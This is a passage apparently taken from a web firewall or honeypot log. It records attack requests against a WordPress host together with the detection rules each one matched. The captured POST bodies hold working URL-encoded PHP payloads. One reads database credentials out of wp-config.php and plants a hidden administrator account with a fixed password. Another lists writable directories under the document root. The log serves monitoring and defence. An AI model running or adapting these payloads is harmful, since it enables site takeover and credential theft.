D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/feed.php HTTP\/1.1\nsec-fetch-user:?1\nsec-fetch-dest:document\ncontent-length:12640\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\ncookie:4=ea1451643f613b39572752b883798a94; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvM1VvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzyhL2k1MTHvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\nsec-ch-ua:\"Google Chrome\";v=\"107\", \"Chromium\";v=\"107\", \"Not=A?Brand\";v=\"24\"\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"Windows\"\ncontent-type:application\/x-www-form-urlencoded\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-fetch-site:none\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.0.0 Safari\/537.36\nsec-fetch-mode:navigate\n\ngR=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 00:21:43","139.59.143.102","GET","\/.DS_Store","Mozilla\/5.0 (l9scan\/2.0.833323e2632313e2435323e27343; +https:\/\/leakix.net)","url","\\.(htaccess|mysql_history|bash_history|DS_Store|idea|user\\.ini) >> 1:\/.DS_Store","GET \/.DS_Store HTTP\/1.1\naccept-encoding:gzip\nuser-agent:Mozilla\/5.0 (l9scan\/2.0.833323e2632313e2435323e27343; +https:\/\/leakix.net)\nhost:47.254.126.238\nconnection:close\n\n"]
["2026-05-16 01:19:12","213.209.159.254","POST","\/","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.0 Safari\/605.1.15","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> XC:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\nsec-fetch-dest:document\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncontent-type:application\/x-www-form-urlencoded\naccept:*\/*\naccept-encoding:gzip,deflate\ncookie:4=9502d8dfeef0bdc4da77dd3a93ec6aec; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvJRZvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAlMJS0MJDvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\ncontent-length:3339\nsec-fetch-site:none\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.0 Safari\/605.1.15\nsec-fetch-mode:navigate\n\nXC=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 01:19:56","213.209.159.254","POST","\/","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.5 Safari\/605.1.15","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> Ui:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7